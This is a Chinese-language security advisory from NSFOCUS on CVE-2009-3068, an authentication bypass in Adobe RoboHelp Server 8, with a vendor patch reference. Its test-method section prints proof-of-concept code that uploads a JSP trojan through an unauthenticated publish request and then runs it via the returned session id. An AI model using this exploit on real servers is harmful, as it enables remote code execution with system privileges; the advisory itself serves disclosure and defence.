安全研究

安全漏洞
Adobe RoboHelp Server身份验证绕过漏洞

发布日期:2009-09-03
更新日期:2009-09-24

受影响系统:
Adobe RoboHelp Server 8
描述:
BUGTRAQ  ID: 36245
CVE ID: CVE-2009-3068

Adobe RoboHelp软件是一个专业创作工具, 可用于开发帮助系统、电子教学内容、知识库以及方案和步骤。

Adobe RoboHelp Server在实现上存在身份验证绕过漏洞,攻击者可利用此漏洞上传任意代码并以系统级别的权限执行。

<*来源:Intevydis
  
  链接:http://osvdb.org/57896
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Intevydis ()提供了如下测试方法:

b="-----------------------------111\r\n"
b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n"
b+="Content-Type: application/x-java-archive\r\n\r\n"
b+=data # source code of our JSP trojan here
b+="\r\n"
b+="-----------------------------111--\r\n"

s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n"
s+="Host: %s:%d\r\n"%(host, port)
s+="User-Agent: Mozilla\r\n"
s+="UID: 1234\r\n"
s+="Content-Type: multipart/form-data; boundary=---------------------------111\r\n"
s+="Content-Length: %d\r\n"%len(b)
s+="\r\n"
s+=b

sock.sendall(s)
reply=sock.recv(4000)



Get the value of 'sessionid' from the reply and use it in the following to execute the JSP trojan:

s="GET /robohelp/robo/reserved/web/%s/test.jsp HTTP/1.0\r\n\r\n" % session_id
sock.sendall(s)

建议:
厂商补丁:

Adobe
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.adobe.com/support/security/

浏览次数:1794
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障